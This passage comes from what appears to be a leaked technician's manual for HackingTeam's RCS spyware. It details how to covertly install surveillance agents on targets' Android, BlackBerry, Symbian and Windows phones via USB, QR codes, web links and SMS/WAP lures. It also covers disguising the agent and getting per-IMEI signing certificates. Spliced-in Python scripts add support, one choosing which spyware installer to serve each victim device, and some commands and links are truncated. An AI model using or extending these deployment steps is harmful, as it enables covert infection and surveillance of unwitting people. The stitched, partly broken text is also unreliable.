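Both the Windows Phone and the BlackBerry notes above depend on the web server mapping the package extensions to the right MIME types. The following is an added example, not RCS or Collector code, that parses an Apache-style mime.types file and reports which of the four required mappings (.xap, .aetx, .jad, .cod) are missing or point at a different type. The sample file content is constructed for the demonstration.

```python
"""Check that a web server's mime.types maps the sideload package extensions.

Added example, not RCS code. It parses Apache-style mime.types lines
("type/subtype ext1 ext2 ...", '#' starts a comment) and reports which of
the mappings the manual requires for Windows Phone (.xap/.aetx) and
BlackBerry (.jad/.cod) packages are missing or wrong. SAMPLE_MIME_TYPES and
GOOD_MIME_TYPES are constructed data.
"""

# Mappings the manual requires (extension -> MIME type).
REQUIRED = {
    "xap": "application/x-silverlight-app",
    "aetx": "application/x-aetx",
    "jad": "text/vnd.sun.j2me.app-descriptor",
    "cod": "application/vnd.rim.cod",
}


def parse_mime_types(text: str) -> dict[str, str]:
    """Return {extension: mime_type} from mime.types content.

    Comments and blank lines are skipped; a type listed without extensions
    contributes nothing; extensions are lower-cased; on a duplicate the last
    mapping wins, which mirrors how servers usually read the file.
    """
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        mime = parts[0].lower()
        for ext in parts[1:]:
            mapping[ext.lower().lstrip(".")] = mime
    return mapping


def check_required(text: str, required=REQUIRED) -> dict[str, str]:
    """Return {extension: problem} for each required mapping that is missing
    or maps to a different type. An empty dict means the file is acceptable."""
    found = parse_mime_types(text)
    problems = {}
    for ext, want in required.items():
        got = found.get(ext)
        if got is None:
            problems[ext] = f"missing (expected {want})"
        elif got != want:
            problems[ext] = f"mapped to {got}, expected {want}"
    return problems


# Constructed sample: xap is right, aetx is wrong, jad and cod are absent.
SAMPLE_MIME_TYPES = """\
# MIME type                      extensions
text/html                        html htm
application/x-silverlight-app    xap
application/octet-stream         aetx   # placeholder, must be replaced
"""

# Constructed sample that satisfies all four requirements.
GOOD_MIME_TYPES = """\
application/x-silverlight-app        xap
application/x-aetx                   aetx
text/vnd.sun.j2me.app-descriptor     jad
application/vnd.rim.cod              cod
"""

if __name__ == "__main__":
    for ext, problem in sorted(check_required(SAMPLE_MIME_TYPES).items()):
        print(f".{ext}: {problem}")
```

A wrong mapping (for example, .aetx served as application/octet-stream) is reported separately from a missing one, since the phone will refuse or misinterpret the file in both cases but the fix differs.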
Notes for Symbian operating systems
IMPORTANT: follow the procedure to receive a certificate for Symbian. See "Installation Package preparation for Symbian" on page 152.
Operating systems
Android, BlackBerry, Symbian, WinMobile, Windows Phone
Android, WinMobile, Windows Phone parameters
Name: Description
Application name: application name (visible to target).
Require Administrative Privilege: (Android only) if automatic acquisition fails, this option enables the user request to manually obtain root privileges from the device.
WARNING: the request is displayed on the target device.
BlackBerry settings
Name: Description
Application name: installer name (visible to target).
Name, Description, Vendor, Version: (BlackBerry only) application data used to "hide" the agent.
Symbian settings
Name: Description
Application name: application name (visible to target).
Certificate bound to phone IMEI: device certificate.
S60 Edition: operating system version.
Name: Description
Symbian configuration:
- UID 1-6: list of UIDs associated with the certificate
- Key: key file
Local Installation vector
Purpose
Compiling installs the agent on the target's BlackBerry device or creates a folder on the SD card to be inserted in the device.
IMPORTANT: to successfully complete installation on a BlackBerry device, the BlackBerry Desktop Software application must be installed on a Windows computer. The Console will create a .zip file with all the files required to infect a connected BlackBerry. Copy the zip file to the Windows computer (if necessary), then unzip the .zip file. Connect the BlackBerry to the PC using a USB cable, then run the install.bat file. If the BlackBerry is PIN protected, provide the PIN when asked.
Operating systems
BlackBerry, WinMobile
Parameters
None.
QR Code/Web Link vector
Purpose
Compiling creates a QR Code to be added to any website or printout. As soon as the target captures the QR code, the agent is installed in the device.
Operations
As soon as the target connects to the Anonymizer and requests the installer, the Collector downloads the correct installer for the target device's operating system.
Deleting no longer used files
Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management".
Operating systems
Android, BlackBerry, Symbian, WinMobile
NOTE: if the target's operating system is unknown, use the multiplatform version.
Parameters
Name: Description
Application name: installer name (visible to target).
URL: connection to an Anonymizer where the installer was saved.
Require administrative privileges: (Android only) if automatic acquisition fails, this option enables the user request to manually obtain root privileges from the device.
WARNING: the request is displayed on the target device.
Name, Description, Vendor, Version: (BlackBerry only) application data used to "hide" the agent.
Certificate bound to phone IMEI: (Symbian only) device certificate.
S60 Edition: (Symbian only) operating system version.
WAP Push Message vector
Purpose
Creates a message that invites the target to visit a link.
Operations
Sends a message containing either text or a link to the agent installer. If the message is accepted on the target device, the agent will be installed.
IMPORTANT: follow the procedure to receive a certificate for Symbian. See "Installation Package preparation for Symbian" on next page.
Installation
Compiling creates an installer and automatically saves the utility file packet in the folder C:\RCS\Collector\public.
Deleting no longer used files
Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management".
Operating systems
Android, BlackBerry, Symbian, WinMobile
NOTE: if the target's operating system is unknown, use the multiplatform version. This creates installers for all the supported platforms and saves them in the Collector's Public folder. As soon as the target connects to the Anonymizer and requests the installer, the Collector downloads the correct installer for the target device's operating system.
Parameters
Name: Description
Application name: installer name (visible to target).
Phone Number: target's phone number, including international area code.
URL: connection to an Anonymizer where the installer was saved. If the package was saved on another website, specify the URL.
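The multiplatform note above says the Collector serves the installer that matches the requesting device's operating system, but not how the device is recognized. The following is an added example, not Collector code, of the usual approach: classifying the HTTP User-Agent header and mapping the result to a per-platform file. The regular expressions, installer file names and sample User-Agent strings are assumptions and constructed data. Windows Phone is included alongside the manual's Android, BlackBerry, Symbian and WinMobile list because its User-Agent shares the IEMobile token with Windows Mobile and has to be matched first; the edge case worth seeing is exactly that ordering.

```python
"""Choose the per-platform installer for an incoming download request.

Added example, not Collector code. The manual only says the Collector
"downloads the correct installer for the target device's operating system".
UA_RULES, INSTALLERS and SAMPLE_UAS are assumptions / constructed data.

Caveat: the User-Agent is client-controlled and trivially spoofed, so this
is a convenience for choosing a file, not a security control; anything
unrecognized is reported as None rather than guessed.
"""
import re
from typing import Optional

# Ordered from most to least specific. "Windows Phone" must precede
# "Windows Mobile" because both families carry the "IEMobile" token.
UA_RULES = [
    ("winphone", re.compile(r"Windows Phone", re.I)),
    ("winmobile", re.compile(r"Windows CE|Windows Mobile|IEMobile", re.I)),
    ("blackberry", re.compile(r"BlackBerry|\bBB10\b", re.I)),
    ("symbian", re.compile(r"SymbianOS|Symbian|Series ?60|\bS60\b", re.I)),
    ("android", re.compile(r"\bAndroid\b", re.I)),
]

# Assumed (hypothetical) installer file names in the public folder.
INSTALLERS = {
    "android": "installer_android.apk",
    "blackberry": "installer_blackberry.zip",
    "symbian": "installer_symbian.sis",
    "winmobile": "installer_winmobile.cab",
    "winphone": "installer_winphone.zip",
}


def classify(user_agent: str) -> Optional[str]:
    """Return the platform key for a User-Agent, or None if unrecognized."""
    for platform, pattern in UA_RULES:
        if pattern.search(user_agent):
            return platform
    return None


def pick_installer(user_agent: str) -> Optional[str]:
    """Map a User-Agent to the installer file to serve, or None."""
    platform = classify(user_agent)
    return INSTALLERS.get(platform) if platform else None


# Constructed sample requests, representative of the device generation
# the manual covers.
SAMPLE_UAS = {
    "lumia": "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; "
             "Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)",
    "htc_wm": "HTC_Touch_Pro Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; "
              "IEMobile 7.11)",
    "galaxy": "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; GT-I9300 "
              "Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko)",
    "bold": "BlackBerry9700/5.0.0.862 Profile/MIDP-2.1 Configuration/CLDC-1.1 "
            "VendorID/331",
    "n97": "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; "
           "Profile/MIDP-2.1 Configuration/CLDC-1.1)",
    "desktop": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 "
               "Firefox/17.0",
}

if __name__ == "__main__":
    for name, ua in SAMPLE_UAS.items():
        print(f"{name:8} -> {pick_installer(ua)}")
```

Swapping the first two rules would send a Lumia the Windows Mobile CAB, which is the kind of silent misdelivery a quick test against a few captured User-Agents catches.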
Name: Description
Service Type: type of service requested:
- Loading: the target phone is automatically redirected to the resource indicated in the URL. Depending on the phone security settings, the application can be automatically installed or a message can be displayed to the user, asking how to proceed.
- Indication: a message will be displayed asking the user how to proceed.
- SMS: sends the link preceded by the specified text.
Require administrative privileges: (Android only) if automatic acquisition fails, this option enables the user request to manually obtain root privileges from the device.
WARNING: the request is displayed on the target device.
Text: (for Indication and SMS only) text for the target user.
Name, Description, Vendor, Version: (BlackBerry only) application data used to "hide" the agent.
Certificate bound to phone IMEI: (Symbian only) device certificate.
S60 Edition: (Symbian only) operating system version.
Installation Package preparation for Symbian
Introduction
Starting from Symbian OS version 9.1, a Symbian Development Certificate is required to install and run an agent on a Symbian device. Currently, each issued certificate supports up to 1000 IMEIs and up to 17 capabilities.
Recommended sequence
Complete the following steps to request a certificate:
Step Action
1 Obtain the editor ID (Publisher ID)
2 Creating Certificate Public and Private keys
Step Action
3 Creating the Development Certificate
Obtain the Editor ID
Follow the procedure below:
Step Action
1 Purchase the certificate from TrustCenter.
NOTE: the certificate must be a "Developer Certificate" and not a "Test House Certificate".
2 After purchasing the certificate (valid for one year), the following documentation must be provided by the applicant:
- a copy of the applicant company's official registration (from the authorities) or equivalent;
- a written application signed by an authorized company official;
- a signed copy of the applicant's ID or passport (with photo and signature).
Creating Certificate Public and Private keys
Follow the procedure below:
Step Action
1 Within several days of application (usually four), you will receive a confirmation e-mail from TrustCenter with a link to the certificate and the editor ID.
2 Save the certificate on the computer.
3 Download and install the TC-Converter tool.
4 Copy YourDeveloperCert.p12 to the TC-Converter folder.
5 Run the converter on YourDeveloperCert.p12: the Tc.key and Tc certificate files are created.
Creating the Development Certificate
After creating the various keys, the certificate must be created with the appropriate IMEI numbers. This procedure can be run several times as new IMEI numbers need to be added.
NOTE: for further information see the Symbian Signed guide.
Follow the procedure below:
Step Action
1 Create an account at symbiansigned.com.
2 • Click My Dashboard and select the My Profile tab.
  • Make sure the Country matches the data in the editor ID.
  • Click Verify Account.
3 • Download the .sis file.
  • Sign the .sis file with the .cer and .key files for the same editor ID using this command:
    signsis sis.sis signed.sis tc.cer tc.key
  • Upload the signed .sis file.
4 Login to the created account.
5 • Click My Dashboard and select the Manage UIDs tab.
  • Request six UIDs (within the protected range) and leave the other fields blank.
  • Once the UIDs are obtained, select the Development Certificate tab.
  • Enter the device IMEI numbers (to obtain the number, enter or read the code in the battery compartment).
  • Click Download Certificate.
  IMPORTANT: do not upload the RCS .sis agent on the Symbian Signed site. For each new target, enter the new IMEI number and download the new Development Certificate. Do not download the .sis file again.
  • Use the Development Certificate to sign RCS agents for Symbian.
Installation Package preparation for Windows Phone
Introduction
For Windows Phone devices, the agent is installed on the target device through a Windows Phone application. The following files must be on the RCS server to successfully complete agent installation:
• a .pfx file to sign the Windows Phone .xap installation packet
• an .aetx file as a Windows Phone application certificate
Recommended sequence
Complete the following steps to generate the .pfx and .aetx files and load them on the RCS server:
Step Action
1 Obtain a Symantec ID code to be used to purchase the certificate required to distribute a Windows Phone application.
2 Obtain the Symantec certificate required to distribute Windows Phone applications.
3 Install the Symantec certificate required to distribute Windows Phone applications.
4 Generate the .pfx and .aetx files.
5 Load the .pfx and .aetx files on the RCS server.
How to read these instructions
NOTE: links to web pages in the procedures were working when the manual was written. If a link does not work, find the right web page.
In the event of discrepancies between what is indicated in the manual and the instructions received directly from the concerned organizations, follow the organizations' instructions.
Obtaining a Symantec ID code
Proceed as follows to obtain it:
Step Action
1 Register a Microsoft account.
2 Register an account in Windows Phone Dev Center, logging in with your Microsoft account.
Step Action
3 • Click Join Now: the Windows Phone Dev Center account registration page appears.
  • Select Company as Account Type.
  • Click Next.
  • In the Account Info section, enter your data and contacts.
  • In the Publisher Info section, enter the name to be displayed as the application distributor during installation as the Publisher Name.
  WARNING: the user who installs the .xap packet and .aetx certificate on his phone sees this name.
  • In the Approver Info section, enter the data and contact information for the company manager who can approve the registration request.
  • Complete registration following the on-screen instructions.
  IMPORTANT: provide a correct email address and phone number since they will be used to validate registration and provide the Publisher ID.
4 After registering, you will receive an email from Symantec, the Microsoft partner that validates companies registered with Windows Phone Dev Center, to validate registration. Additional communications may also occur by phone.
  IMPORTANT: have the Approver respond to the Symantec email.
5 After validation, you will receive an email with account data:
  • Publisher ID
  • Publisher Name
NOTE: to learn more, visit
Obtaining a Symantec certificate
The Enterprise Mobile Code Signing Certificate is required to distribute Windows Phone applications.
Proceed as follows to obtain it:
Step Action
1 Purchase an Enterprise Mobile Code Signing Certificate from Symantec at
Step Action
2 • Enter the Publisher ID you received and the email indicated in the Account Info section during Windows Phone Dev Center registration.
  • Complete the purchase following the on-screen instructions.
3 When finished, you will receive a couple of emails from Symantec indicating:
  • order confirmation
  • the list of enabled functions according to the order
  • the certificate and instructions on how to import it on your computer
NOTE: to learn more, visit
Installing the Symantec certificate
To complete Enterprise Mobile Code Signing Certificate installation, first install:
• Enterprise Mobile Root;
• Enterprise Mobile CA certificate.
IMPORTANT: always use the same browser to download certificates. The Firefox browser is referred to in the described procedure.
Follow the procedure below:
Step Action
1 • Open Firefox.
  • Copy and paste the URL received in the email in the address bar to install the Microsoft Enterprise Mobile Root Certificate.
  • In the Download certificate dialog window, select all three check boxes and click OK.
2 • Copy and paste the URL received in the email in the address bar to install the Microsoft Enterprise CA Root Certificate.
  • In the Download certificate dialog window, select all three check boxes and click OK.
  NOTE: to check whether the certificates were installed, select Options in the Firefox menu, then Advanced. Next select the Certificates tab and click Show Certificates: the names of the installed certificates appear in the certificate list under Authorities.
3 Install the Enterprise Mobile Code Signing Certificate from the link in the email you received and click Continue.
Generate the .pfx and .aetx files
The .pfx and .aetx files required to sign and distribute Windows Phone applications can be generated with the Enterprise Mobile Code Signing Certificate.
IMPORTANT: the procedure requires Windows Phone Software Developer Kit 8.0, available at , to be installed on the computer. The AET Generator tool included in this kit lets you create the .aetx file.
IMPORTANT: use the same browser used to install the certificates to run the procedure. The Firefox browser is referred to in the described procedure.
Follow the procedure below:
Step Action
1 Open Firefox.
2 In the Firefox menu, select Options. Next, select Advanced, and then the Certificates tab.
3 Click Show certificates.
4 • In the Personal certificates tab, select the Publisher name certificate and click Export.
  • Save the file with the .p12 extension.
  • Enter the certificate export password: "password"
  IMPORTANT: enter this and not other passwords.
5 Rename the file with the .pfx extension.
6 From the Windows command prompt, open the folder where the .pfx file is saved and run the following command:
  "%ProgramFiles
  FileName.pfx
  password
  where FileName is the name of the .pfx file.
  Result: three files are generated in the folder where the .pfx file is saved:
  • AET.aetx
  • AET.aet
  •
NOTE: to learn more, visit
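The export in step 4 produces a PKCS#12 (.pfx) container protected by the fixed password "password", and the Publisher Name inside it is what the phone user sees at install time. The script below is an added example, not part of the guide or of HackingTeam's tooling: it builds a constructed self-signed test container, then shows how to open a .pfx, read the publisher identity and validity, and flag that the container still uses the prescribed well-known password. It assumes the `cryptography` library; the publisher name and certificate are hypothetical test data.

```python
# Added example (not HackingTeam code): inspect a Windows Phone signing .pfx.
from datetime import datetime, timedelta, timezone

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import NameOID

# The guide prescribes this exact export password for the .p12/.pfx file.
GUIDE_EXPORT_PASSWORD = b"password"


def make_test_pfx(publisher_name: str) -> bytes:
    """Constructed self-signed PKCS#12 standing in for the exported Publisher cert."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, publisher_name)])
    now = datetime.now(timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - timedelta(days=1))
        .not_valid_after(now + timedelta(days=365))
        .sign(key, hashes.SHA256())
    )
    return pkcs12.serialize_key_and_certificates(
        name=b"publisher", key=key, cert=cert, cas=None,
        encryption_algorithm=serialization.BestAvailableEncryption(GUIDE_EXPORT_PASSWORD),
    )


def inspect_pfx(pfx_bytes: bytes, password: bytes = GUIDE_EXPORT_PASSWORD) -> dict:
    """Report the identity a phone user will see, the issuer, remaining validity and
    whether the container uses the guide's default password. ValueError on bad password."""
    key, cert, _chain = pkcs12.load_key_and_certificates(pfx_bytes, password)
    if cert is None:
        raise ValueError("PKCS#12 container holds no end-entity certificate")
    cn = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)
    not_after = getattr(cert, "not_valid_after_utc", None)  # cryptography >= 42
    if not_after is None:
        not_after = cert.not_valid_after.replace(tzinfo=timezone.utc)
    return {
        "publisher_name": cn[0].value if cn else None,  # shown to the phone user
        "issuer": cert.issuer.rfc4514_string(),
        "days_remaining": (not_after - datetime.now(timezone.utc)).days,
        "has_private_key": key is not None,
        "uses_default_password": password == GUIDE_EXPORT_PASSWORD,
    }
```

Run `inspect_pfx` on the real exported file before copying it to the server; a `uses_default_password` of True means anyone who obtains the file can sign with that publisher identity.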
Load the .pfx and .aetx files on the RCS database server
Follow the procedure below:
Step Action
1 Copy the files to the RCS database server.
2 From the Windows command prompt, run the following command to use the .pfx file to sign Windows Phone applications:
  rcs-db-config --sign-pfx-winphone FilePath\FileName.pfx
  where FilePath is the .pfx file path on the RCS server.
3 From the Windows command prompt, run the following command to use the .aetx file as a Windows Phone application certificate:
  rcs-db-config --sign-aetx-winphone FilePath\FileName.aetx
  where FilePath is the .aetx file path on the RCS server.
]HackingTeam[
HT S.r.l.
via della Moscova, 13
20121 Milano (MI)
Italy
tel.: 39 02 29 060 603
fax: +39 02 63 113 946
info@hackingteam.com
RCS 9 Technician's Guide
Technician's Guide 1.5 SEP-2013
COPYRIGHT 2013